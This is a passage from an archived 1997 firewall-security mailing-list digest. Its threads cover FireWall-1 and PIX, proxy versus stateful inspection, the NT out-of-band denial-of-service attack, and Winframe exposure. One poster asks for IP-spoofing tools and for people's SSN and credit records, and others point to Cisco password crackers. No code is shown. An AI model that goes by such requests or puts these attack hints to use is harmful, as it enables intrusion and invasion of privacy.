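The overlapping case is the one to dwell on: with "first" the reassembled stream reads "debug", with "last" it reads "dXXug", so a filter and a destination host that resolve overlaps differently will disagree about what was sent, and the attacker chooses which of the two gets to see the command. A proxy avoids the question because the server only ever receives the proxy's own, already reassembled, stream.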
---
Truck

From owner-firewalls-outgoing Fri Jun 6 05:01:01 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA02834 for firewalls-outgoing; Fri, 6 Jun 1997 03:56:48 -0700 (PDT)
Received: from proxy.src.siemens.es (ms1.src.siemens.es [195.53.72.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA02796 for ; Fri, 6 Jun 1997 03:56:34 -0700 (PDT)
Received: from cceballos.src.siemens.es by proxy.src.siemens.es with SMTP (Microsoft Exchange Internet Mail Service Version 5.0.1457.7) id LG9HY3VF; Fri, 6 Jun 1997 13:04:17 +0200
Message-ID: <3397EF0A.68E1@iponet.es>
Date: Fri, 06 Jun 1997 13:05:46 +0200
From: Cristina Ceballos
Reply-To: cceballos@src.siemens.es
Organization: Siemens Redes Corporativas
X-Mailer: Mozilla 3.0Gold (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: SecuRemote on FireWall-1 3.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

I am trying to use SecuRemote to access the internal network from the Internet in an encrypted manner. In order to do that I have to install the SecuRemote client on the PC accessing my network from the Internet and also, on the server side, SecuRemote is implemented on top of a Firewall-1 Virtual Private Network.

My questions are:

Is a Virtual Private Network just an object (network type) I have to define????

Do I need to have a Certified Key in order to be able to use this encryption???? (I shouldn't..)

If anyone is using SecuRemote I would appreciate your help.

Thanks.
Cristina Ceballos
--
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: INAS 1.0.2

mQCNAjNfHNsAAAEEAMDAXftbeYZEfqRDRLJSxoMRoWjizoY+0sIh4FvrNkrW4A5Y
qEdpPJhwT7nIRQX5iI0HFSWUjYCNwUqvloiWZHJ1aCZpv6exfYthOcnEoRLnu9Vp
sXEpZ8XT4iQMM9QTeRlDvtlHYbtVJal9bSK5bs+62Z9Kcp3Tj0I7PxDU55yBAAMF
tCxDcmlzdGluYSBDZWJhbGxvcyA8Y2NlYmFsbG9zQHNyYy5zaWVtZW5zLmVzPokA
lQIFEDNfHNtCOz8Q1OecgQEBVW4D/AgekAW+MxDk6VAWJOW3ZaYGggQVnH2kPZGP
Ox0t7TKrfsMhQItYLfQCjQl3/PQ4rCRUv3g0mcSa4ctXB21mNVkI0B3s9iVM59p1
cvQMUnmdVqkBVoslMuktqnfTIVSCY0FvFFAN5QhK4fN89LOpqleg509CrRQhrlVB
5c2YKtKk
=tBjV
-----END PGP PUBLIC KEY BLOCK-----

From owner-firewalls-outgoing Fri Jun 6 05:52:37 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA21243 for firewalls-outgoing; Thu, 5 Jun 1997 16:39:52 -0700 (PDT)
Received: from pctb.industryone.net ([208.135.121.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA21204 for ; Thu, 5 Jun 1997 16:39:40 -0700 (PDT)
Received: from [206.114.39.33] by pctb.industryone.net (SMTPD32-3.03) id AEF765C011E; Thu, 05 Jun 1997 19:42:47 -0400
Message-ID: <339FE10D.7AB3@Who.net>
Date: Thu, 12 Jun 1997 07:44:13 -0400
From: -= TaLoN =-
Reply-To: Talon@Who.net
Organization: CVI SOFTWARE
X-Mailer: Mozilla 3.0 (Win95; I)
MIME-Version: 1.0
To: firewalls@greatcircle.com
Subject: IP SPOOFING
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Okay, I'm pretty new to investigative services with Internet Service Providers, but what I'm mainly interested in would be information related to faking / spoofing IP addresses & network nodes. If anyone out there has any information related to that, or even information or software which allows one to do that, please send it to me at Talon@who.net. Also, looking for assistance in finding information on people (i.e. SSN, CREDIT RECORDS, ETC.); please email me AS SOON as you get any information. Thanks!
Once again, please email me: Talon@mail.org

Jason Burton - Certified Network Investigator
Vector Classified Section

From owner-firewalls-outgoing Fri Jun 6 05:58:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA13382 for firewalls-outgoing; Thu, 5 Jun 1997 18:37:38 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA13328 for ; Thu, 5 Jun 1997 18:37:18 -0700 (PDT)
Received: from mjr.clark.net (mjr.clark.net [168.143.19.61]) by mail.clark.net (8.8.5/8.6.5) with SMTP id VAA24079 for ; Thu, 5 Jun 1997 21:40:46 -0400 (EDT)
Message-Id: <199706060140.VAA24079@mail.clark.net>
Comments: Authenticated sender is
From: "Marcus J. Ranum"
Organization: Network Flight Recorder, Inc.
To: Firewalls@GreatCircle.COM
Date: Thu, 5 Jun 1997 21:39:18 +0000
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: Re: Fortezza's Fate??
Reply-to: mjr@clark.net
In-reply-to: <199706051957.MAA15686@honor.greatcircle.com>
X-mailer: Pegasus Mail for Win32 (v2.53/R1)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> There are a lot of rumors buzzing around DC these days to the
> effect that NSA and the Joint Chiefs have tossed in the towel and will,
> within weeks, approve DoD purchases for non-Fortezza security systems, for
> both strong authentication

Wow!! I bet that's gonna really do wonders for all your Security Dynamics stock options, Vin! Congrats!!

mjr.
-----
Marcus J. Ranum, CEO, Network Flight Recorder, Inc.
Personal
Work
New Book!!
From owner-firewalls-outgoing Fri Jun 6 06:01:43 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA08832 for firewalls-outgoing; Fri, 6 Jun 1997 04:27:57 -0700 (PDT)
Received: from namsa.nato.int (ddnfw0.namsa.nato.int [147.36.201.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id DAA01385 for ; Fri, 6 Jun 1997 03:48:44 -0700 (PDT)
Received: by ddnfw0.namsa.nato.int id <17033-1>; Fri, 6 Jun 1997 12:53:12 +0100
Message-Id: <97Jun6.125312gmt+0100.17033-1@ddnfw0.namsa.nato.int>
Date: Fri, 6 Jun 1997 11:53:36 +0100
From: Thierry GUINET
X-Mailer: Mozilla 3.0 (X11; I; HP-UX A.09.05 9000/735)
Mime-Version: 1.0
To: Robert Ståhlbrand
Cc: firewalls@GreatCircle.COM
Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts
References: <43BED8177D10D011A69A0800092C15D7011BFD@haig.oplab.nmac.ericsson.se>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Robert Ståhlbrand wrote:
>
> What is the problem here???
> Of course (as Mike Hedlund says) is a NT-machine (win95 and win3.11 as
> well) only vulnerable to the OOB-bug on port 139 (netbios) and I REALLY

I hope I'm making a false assertion, but I think you're wrong. I read that some tests have been done using the urgent flag against port 80 and that it worked just fine :( I don't have the paper at hand but if you're interested I can dig into my archives.

Thierry

--
Thierry Guinet
T.Guinet@namsa.nato.int
Phone: +352/30.63-6812
Fax: +352/30.87.21

In order to create an apple pie from scratch, you must first create the universe.
Carl Sagan

From owner-firewalls-outgoing Fri Jun 6 06:01:48 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA18424 for firewalls-outgoing; Thu, 5 Jun 1997 19:03:12 -0700 (PDT)
Received: from m4.nassau.cv.net (m4.nassau.cv.net [167.206.32.6]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA18360 for ; Thu, 5 Jun 1997 19:02:51 -0700 (PDT)
Received: from m5.nassau.cv.net by m4.nassau.cv.net with ESMTP (1.40.112.8/16.2) id AA199602806; Thu, 5 Jun 1997 22:06:46 -0400
Received: from nassau.cv.net.nassau.cv.net ([10.4.55.84]) by m5.nassau.cv.net with SMTP (1.40.112.8/16.2) id AA191992804; Thu, 5 Jun 1997 22:06:44 -0400
Message-Id: <3.0.1.16.19970605220043.356f0950@mail-hub>
X-Sender: kgunther@mail-hub
X-Mailer: Windows Eudora Light Version 3.0.1 (16)
Date: Thu, 05 Jun 1997 22:00:43 -0400
To: firewalls@GreatCircle.COM
From: Ken Gunther
Subject: Does Winframe need a firewall?
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

We are currently using Winframe by Citrix to give remote users access to applications at our datacenter. Access to the Winframe box is through the IBM Global Network (IGN). IGN is a subscribers-only network. It is not as open as the Internet, but by no means do we have control over who is on it.

We currently have a firewall in front of the Winframe box, but there is a noticeable delay in keystrokes when going through the firewall (TIS Toolkit on a Linux box). We have performed some tests where for short periods of time the Winframe box was connected directly to the IGN and the keystroke delays went away.

Is Winframe safe to put directly on the untrusted network? We are worried about unauthorized people getting through to the trusted side as well as denial of service attacks where people try to crash Winframe.
Ken (kgunther@nassau.cv.net)

From owner-firewalls-outgoing Fri Jun 6 06:54:18 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA25482 for firewalls-outgoing; Fri, 6 Jun 1997 00:51:03 -0700 (PDT)
Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA25385 for ; Fri, 6 Jun 1997 00:50:35 -0700 (PDT)
Received: from cons-evyncke.cisco.com (brussels-ppp3.cisco.com [171.68.146.24]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id JAA26103; Fri, 6 Jun 1997 09:52:11 +0200 (METDST)
Message-Id: <3.0.32.19970606094235.006df76c@brussels.cisco.com>
X-Sender: evyncke@brussels.cisco.com
X-Mailer: Windows Eudora Pro Version 3.0 (32)
Date: Fri, 06 Jun 1997 09:54:48 +0000
To: Matt Eide , "'firewalls@GreatCircle.COM'"
From: Eric Vyncke
Subject: RE: PIX and Firewall-1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 09:47 5/06/97 -0500, Matt Eide wrote:
>Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), state-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.

As I'm working with Cisco, I can only speak for the PIX (but I guess FW-1 behaves roughly the same). Full-state inspection means that ALL packets are inspected to check against the maximum of checks: sequence numbers, ports, ... For some protocols like HTTP, VDO, ... the PIX even understands the protocol specification and is able to act on layer 7 data (like URL logging, disabling Java applets, ...).
Do not confuse this normal behaviour with the in-band 'strong' authentication called 'cut-through proxy'. In this case, for some protocols (Telnet, FTP and HTTP), the PIX is able to challenge the client USER for 'strong' authentication. This challenge occurs in the first data packet with respect to the protocol; then, after authentication and if the US
ER is authorized, the rest of the data packets are allowed to flow through the PIX but still with full-state inspection.

Just my 0.25 BEF

Eric

>
>I would like to add that Firewall-1 can be set to continue monitoring all the packets of an established session and will check them against the rule base.
>
>Later,
>
>Matt
>Meide@sybronint.com
>

Eric Vyncke
Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677
Fax: +32-2-778.4300
E-mail: evyncke@cisco.com
Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 06:51:21 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA12697 for firewalls-outgoing; Thu, 5 Jun 1997 18:32:53 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA12615 for ; Thu, 5 Jun 1997 18:32:33 -0700 (PDT)
Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id SAA21387 for ; Thu, 5 Jun 1997 18:38:50 -0700 (PDT)
Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id SAA01939 ; Thu, 5 Jun 1997 18:34:54 -0700
From: girsch@marben.com (Arnaud Girsch)
Message-Id: <199706060134.SAA01939@mail.marben.com>
Subject: Re: ssh proxy for fwtk
To: benedikt@devnull.ruhr.de (Benedikt Stockebrand)
Date: Thu, 5 Jun 1997 18:34:53 -0700 (PDT)
Cc: girsch@marben.com, pnash@hanshan.bbnplanet.com, don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@GreatCircle.COM, ylo@cs.hut.fi
In-Reply-To: <87k9kbfz28.fsf@devnull.ruhr.de> from "Benedikt Stockebrand" at Jun 3, 97 06:09:35 pm
X-Organization: Marben Products, Inc. / DSET Corporation
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> girsch@marben.com (Arnaud Girsch) writes:
>
>> For example, you probably restrict X because you think that X is never secure
>> and can be abused, etc ... Giving access to X within an ssh tunnel protects
>> against most of the X problems, so why not give X access then?
>
> I'm not sure, but what about this one: If the remote machine has been
> hacked, then X forwarding can be more of a problem than help. If the
> remote sshd (or /bin/*sh or whatever) has been modified to use that X
> forwarding they're just about right in your local machine. And you
> can't even tell because you'd need your local user's private key to
> decrypt things to analyze them.
>
> Anyone know more about this?
>

In any case, SSH is based on a double trust of both hosts. If one of the hosts is compromised, you might be exposed to break-ins.

Arnaud.
--
Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/

From owner-firewalls-outgoing Fri Jun 6 06:59:26 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01383 for firewalls-outgoing; Thu, 5 Jun 1997 08:51:24 -0700 (PDT)
Received: from gargoyle.clark.net (pm2-112.dcwt.infi.net [208.136.65.112]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA01365 for ; Thu, 5 Jun 1997 08:51:16 -0700 (PDT)
Received: (qmail 6337 invoked by uid 500); 5 Jun 1997 15:58:17 -0000
Date: Thu, 5 Jun 1997 11:58:17 -0400 (EDT)
From: "Paul D. Robertson"
X-Sender: proberts@gargoyle
To: Daniel Strawson
cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Thu, 5 Jun 1997, Daniel Strawson wrote:

> Hang on a moment.
>
> Let me put this in perspective.
>
> As I understand it, this problem results from sending packets with a
> particular IP option set in the header. (Please confirm I'm right here
> someone).

That's only a part of the problem (OOB); the follow-up attacks (Son of OOB), besides setting the options differently, also include negotiating an invalid TCP window size, which it seems NT disregards the sequence numbers in, and happily sets the window, then can't use it.

> Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to
> crash, you get the NT system that it is running on to crash, so it is not
> an insecurity, but a claimed feature that doesn't work.

That's a Denial of Service attack, and certainly is an insecurity. The bastion host shouldn't be vulnerable to attacks such as this. If FW1 were an application layer gateway, then passing it off as an OS bug would be more acceptable (and woe on ye that chose an insecure platform). With FW1 examining each packet anyway, the onus should be on protecting itself as well.

> So, either -
>
> - The IP Options drop code in FW-1 doesn't work.
>
> or
>
> - I do not properly understand this attack and it does not work as I
> imagine - in this case, please correct me.

or

- FW1 happily removes the options from packets it forwards, but not those destined for itself. (Have you tested through FW1 as well?)

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From owner-firewalls-outgoing Fri Jun 6 07:26:50 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23224 for firewalls-outgoing; Thu, 5 Jun 1997 07:46:57 -0700 (PDT)
Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23168 for ; Thu, 5 Jun 1997 07:46:37 -0700 (PDT)
Received: from uucp3.UU.NET by relay5.UU.NET with SMTP (peer crosschecked as: uucp3.UU.NET [192.48.96.34]) id QQcsqd21242; Thu, 5 Jun 1997 10:49:26 -0400 (EDT)
Received: from fmrco.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Thu, 5 Jun 1997 10:49:18 -0400
Received: from ocean.fmrco.com by fmrco.com (4.1/SMI-4.1) id AA09308; Thu, 5 Jun 97 10:37:23 EDT
Received: from capstan.devonshire (capstan.fmrco.com) by ocean.fmrco.com (4.1/SMI-4.1) id AA09844; Thu, 5 Jun 97 10:37:24 EDT
Received: from capstan by capstan.devonshire (SMI-8.6/SMI-SVR4) id KAA09421; Thu, 5 Jun 1997 10:36:47 -0400
Date: Thu, 5 Jun 1997 10:36:47 -0400 (EDT)
From: Andrew Luca
Reply-To: Andrew Luca
Subject: RE: Solaris
To: ocean!uunet!libofmich.lib.mi.us!amyc@uunet.uu.net, ocean!uunet!monarch.rnb.com!kempster@uunet.uu.net
Cc: ocean!uunet!GreatCircle.COM!firewalls@uunet.uu.net
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/plain; charset=us-ascii
Content-Md5: gcsYUDAqiU4JB2T47qQ0sA==
X-Mailer: dtmail 1.2.0 CDE Version 1.2_22 SunOS 5.6 sun4u sparc
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Some of the Solaris kernel can get unhappy if you are tweaking like this, since supernetting is not officially supported under 2.5.x. However, in Solaris 2.6 it is. If you can wait for a couple of months, 2.6 is a real winner. The second beta seems to be quite stable and feature rich.
Drew

> Date: Wed, 04 Jun 1997 09:32:25 -0400 (EDT)
> From: Ken Kempster
> To: "Amy (Cremer) Briggs"
> Subject: RE: Solaris
> Cc: uunet!GreatCircle.COM!firewalls
>
>
> On 03-Jun-97 "Amy (Cremer) Briggs" wrote:
> >First of all, if there is a better list to post this to, please let me know.
> >I've checked out Sun's web site and didn't find any mention of a Solaris
> >listserv.
> >
> >Does anyone know how you can trick a Solaris box into
> >treating a class C address as a class B? For example, we want to use
> >2xx.xx.0.0 as a class B address. I've entered the class B subnet mask for
>
> It is possible to turn a class C into a class B, but you do it by
> using non-standard subnet masking; you can't use the standard class B
> subnet mask.
>
> There is a way to calculate the subnet mask based on the range
> of IPs you will be using within the class C address when you break it up.
>
> A book detailing the functionality of the IP stack should have in detail
> how to do this.
>
>
> >this network in the /etc/netmasks file, which is how I thought you could do it,
> >but it isn't working for me. It still thinks it's a class C address and won't
> >route properly if I set up my routes using it as a class B address.
> >Finding a way to make this work would save me hours of time because I
> >have 5 full class B (technically class C) networks to do this for, and
> >entering all the class C's within all 5 class B's would take me a while as
> >well as complicate my routing table.
> >
> >Thanks for any help or information you can give me.
> >
> >Amy
> >
> > \\\\\\\\\\\\\\Amy Briggs  Microcomputer Support Specialist///////////////
> >  Library of Michigan            amyc@libofmich.lib.mi.us
> >\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\////////////////////////////////////////////
> >        ** It's not what you've got, it's what you give--TESLA **
> >
>
> |~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
> | Ken Kempster            kempster@monarch.rnb.com         |
> | Network Systems Engineer              _\|/_               |
> | Republic National Bank                (o o)               |
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~oOO-(_)-OOo~~~~~~~~~~~~~~

Andrew Luca
Fidelity Investments
82 Devonshire Street F2D
Boston, MA 02109

From owner-firewalls-outgoing Fri Jun 6 07:26:54 1997
Date: Fri, 6 Jun 1997 08:18:47 -0500
From: Craig Brozefsky
Subject: RE: PIX and Firewall-1
To: Eric Vyncke
cc: firewalls@GreatCircle.COM
In-Reply-To: <3.0.32.19970606094942.006e0a64@brussels.cisco.com>

On Fri, 6 Jun 1997, Eric Vyncke wrote:
> Craig,
>
> Cannot resist replying :-) Beware that I'm working for Cisco Systems ;-)

Is cool.

> I both agree and disagree:
>
> 1) NAT is NOT a security feature, I agree thus 200% with you
>
> - PIX is very strong due to its fullstate inspection against
> attacks for IP, TCP, ... protocols: SYN flooding, IP spoofing,
> TCP/IP session hijacking, ... It also randomizes the TCP sequence
> numbers of the TCP sessions going through it

I do not agree that 'fullstate inspection' makes PIX 'very strong'.
See previous thread. I'm reluctant to start yet another SMLI vs. App Proxy showdown.

> - PIX knows about the internal of some protocols (from ICMP, to RealAudio
> via HTTP) and is able to check / react on these protocols

Can I write filters for PIX that will be aware of the internals of protocols? Or do I have to wait for Cisco to write them?

Craig Brozefsky                 craig@onshore.com
onShore Inc.                    http://www.onshore.com/~craig
Development Team                p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Fri Jun 6 07:40:26 1997
Message-ID: <01BC72C9.601A2390@slcan5p58.ozemail.com.au>
From: Consultancy Group
To: "'Eric Vyncke'", "Jonathan M. Bresler", Cy Ardoin
Cc: "Firewalls@GreatCircle.COM"
Subject: RE: PIX and FW-1 (packet filter Question)
Date: Fri, 6 Jun 1997 22:31:06 +1000

-----Original Message-----
From: Eric Vyncke [SMTP:evyncke@cisco.com]
Sent: Friday, June 06, 1997 7:55 PM
To: Jonathan M.
Bresler; Cy Ardoin
Cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)

At 13:18 5/06/97 -0400, Jonathan M. Bresler wrote:
>
>>I don't think there is anything an application firewall can
>>do that can't also be done by a "packet filter" firewall. The
>
> trivial example:
> a smtp application level proxy can disable the "debug" command
>for every sendmail behind that firewall.

This kind of stuff is also done in some full-state inspection firewalls :-)

What about the sort of 'potential' nasties such as Java and Active-X? Also stripping of sendmail clever options via SMAP! The default security policy of a strong firewall is to deny anything not specifically allowed - if you cannot filter at the application level then you cannot control options such as these.

My (paranoid) philosophy is that if you don't expect or understand anything in the comms or application protocol, then bar it from transcending the firewall pending a half-decent business or technical case to allow it through.

>
>>new packet filter firewalls are not like the old Cisco/Bay router
>>filters. The new systems operate at the network layer, but they
>>have knowledge of the protocols and applications. They
>>open up the packets and modify the data. These systems are
>>doing content filtering and other "application" types of operations.
>>Yes, not all of them do these things, but many do, and new
>>feature/functions are being added to these systems every year.
>
>jmb
>
>
>--
>Jonathan M. Bresler              202-452-2831         breslerj@frb.gov
>MS-169 Federal Reserve Board of Governors             Washington DC 20551
>Speaking for myself.
>Others speak for the Federal Reserve Board of Governors
>
>

Eric Vyncke
Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677   Fax: +32-2-778.4300
E-mail: evyncke@cisco.com   Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 08:21:06 1997
Message-Id: <199706061241.FAA22456@honor.greatcircle.com>
From: "Steve Rudolph"
To: "Ryan Russell/SYBASE"
Cc: "firewalls"
Subject: Re: FW-1 and IP Forwarding on NT Box
Date: Fri, 6 Jun 1997 08:49:17 -0400

Ryan and group,

> Retrieving and/or resetting the Cisco password is fairly
> trivial if there is a console port on that card.. haven't used the
> card version, but I've done it on real 2500's many times.
> Search the Cisco web site for "password recovery."

Yes, this works if the console port is an external port and it does not run through the PC bus like the AccessPro 2500 PC Card. It does have an AUX port, but it will not let me send a break signal. I have tried 3 or so terminal programs.

> If they've turned on password encryption, you can either change
> the password, or do a web search for Cisco password crackers,
> I've seen a couple.

Haven't tried those. I found one pretty easy (hack c program for cisco password).

Thanks. I'll let you know.
Steve Rudolph
http://www.datacommcorp.com
srudolph@datacommcorp.com

http://www.rude-dog.com
http://www.rust.net/~stever
stever@rust.net

> ---------- Previous Message ----------
> To: david, firewalls
> cc:
> From: srudolph @ datacommcorp.com ("Steve Rudolph") @ smtp
> Date: 06/05/97 08:26:39 AM
> Subject: Re: FW-1 and IP Forwarding on NT Box
>
> David and group....
>
> I have already got this running. Thank you to all who responded to my
> inquiry. I have learned a lot just from the replies. I left my brain in the
> shower that day..... I forgot to set the Default Gateway on EACH machine
> on both networks to the NIC in the router on that machine's network.
>
> Now I just need to krak the router password for a Cisco AccessPro 2500 PC
> card. This piece of equipment came in a firewall disguise called MCI
> Webmaker. This was a combination port filter router and proxy server. As
> it turns out Intel programmed the software (proxy), and configured the
> router. Vanstar installed the OS (NT), and none of the above are able to
> get me the router password. Right now my DNS is being partially blocked
> because of this (I know very little about DNS, any good books? I am using
> MS DNS-OK for now (:o) ). I contacted Cisco and the only way to break the
> password is to send a break to the com port (remember it is a pc card) in
> terminal mode within 60 seconds, and then begin the recovery sequence.
> Kind of hard to do with NT or 95. I can't seem to find a copy of Dos 5.0
> or an old hard drive anywhere with a dos based terminal program. This
> whole situation is messed. My employer wants to wait to use the router and
> not buy a new one. It is holding up US$40K in billing though. Can anyone
> help, or if you have a similar problem let me know and I will get you the
> correct person to call.
>
> Thanks again
>
> Steve Rudolph
> http://www.datacommcorp.com
> srudolph@datacommcorp.com
>
> http://www.rude-dog.com
> http://www.rust.net/~stever
> stever@rust.net
>
> ----------
> > From: David Harvey-George
> > To: Steve Rudolph ; firewalls@greatcircle.com
> > Subject: Re: FW-1 and IP Forwarding on NT Box
> > Date: Wednesday, June 04, 1997 7:14 PM
> >
> >
> > > I followed all of Microsoft's recommendations.
> >
> > Possibly a bad move.
> >
> > > Two nic cards a and b
> >
> > Sounds like the start of a stand-up comedy routine
> >
> > > A is set with default gateway of b
> > > and b is set with gateway of a
> >
> > it is!
> >
> > Okay, look, the system with the two cards knows how to route to each
> > network. All you've gotta do is set up the default gateway for
> > workstations on network A (NIC A) and the default gateway for workstations
> > on network B (NIC B). Don't touch anything on the router if your network
> > really is this simple (e.g. no other routes). If you have other routes
> > then use the route command directly.
> >
> > > Workstations can ping a and b
> > > Workstations cannot ping network b
> > > IP forwarding is enabled and my route print matches exactly the format of
> > > Microsoft's recommendations.
> > >
> > > I really need to get this up and running. I would get you the route print,
> > > but I cannot get the addresses to copy onto the clip board..duh :)
> >
> > Yeah, I think you better send us the output from netstat on both the
> > 'router' and the workstations.
> >
> > Run netstat -rn from a DoZ window, click on the little Doz icon at the left
> > of the title bar, select edit/mark, mark the stuff you want to send, copy
> > it and paste it.
> >
> > David
> >

From owner-firewalls-outgoing Fri Jun 6 08:31:15 1997
Date: Fri, 6 Jun 1997 09:47:02 -0400 (EDT)
Message-Id: <199706061347.JAA23143@ovid.actech.com>
From: Steve Gaarder
To: firewalls@GreatCircle.COM
Subject: Does Winframe need a firewall?
In-Reply-To: <3.0.1.16.19970605220043.356f0950@mail-hub>

Ken Gunther writes:
> Is Winframe safe to put directly on the untrusted network? We are worried
> about unauthorized people getting through to the trusted side as well as
> denial of service attacks where people try to crash Winframe.
> Ken (kgunther@nassau.cv.net)

I'd treat it like any other NT box, which is to say that *I* wouldn't put it directly on an untrusted net. If all you want to do is provide Winframe, one approach would be to put a second ethernet card in the machine and connect it to the untrusted network through a filtering router, letting only the ICA port through.
Steven Gaarder
Network and Systems Administrator
gaarder@cmold.com
C-MOLD, Ithaca, N.Y., USA

From owner-firewalls-outgoing Fri Jun 6 08:51:59 1997
Date: Fri, 6 Jun 1997 10:35:22 -0500 (CDT)
From: "k. frisco"
To: firewalls@greatcircle.com
Subject: nt web server log

With all the talk about hacking webservers, I was wondering if anyone knows anything about a weird log msg that we got on our NT webserver? It was a GET to robots.txt.

There is no file or image that is related to this file name on our web page. Could not even find it on the server anywhere. Am I unduly concerned?

From owner-firewalls-outgoing Fri Jun 6 09:03:17 1997
From: Adam Shostack
Message-Id: <199706061350.JAA12541@homeport.org>
Subject: Re: Does Winframe need a firewall?
In-Reply-To: <3.0.1.16.19970605220043.356f0950@mail-hub> from Ken Gunther at "Jun 5, 97 10:00:43 pm"
To: kgunther@nassau.cv.net (Ken Gunther)
Date: Fri, 6 Jun 1997 09:50:05 -0400 (EDT)
Cc: firewalls@GreatCircle.COM

If I get an account on IGN, what prevents me from attacking your Winframe box? Do you trust Citrix to have gotten all their security right? What can I gain once I've broken it? (Hints: does it strongly* encrypt passwords as they go over the net? Does it resist password guessing attacks? Session hijacking?)

*For explanations of strong encryption, see the Snake Oil Crypto FAQ.
http://www.research.megasoft.com/people/cmcurtin/snake-oil-faq.html

Adam

Ken Gunther wrote:
| We are currently using Winframe by Citrix to give remote users access to
| applications at our datacenter. Access to the Winframe box is through the
| IBM Global Network (IGN). IGN is a subscribers-only network. It is not as
| open as the Internet, but by no means do we have control over who is on it.
|
| We currently have a firewall in front of the Winframe box, but there is a
| noticeable delay in keystrokes when going through the firewall (TIS Toolkit
| on a Linux box). We have performed some tests where for short periods of
| time the Winframe box was connected directly to the IGN and the keystroke
| delays went away.
|
| Is Winframe safe to put directly on the untrusted network? We are worried
| about unauthorized people getting through to the trusted side as well as
| denial of service attacks where people try to crash Winframe.

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From owner-firewalls-outgoing Fri Jun 6 09:26:54 1997
Message-ID: <97431B954A9AD0119CCC00609733C45506796A@checkov.twc.com>
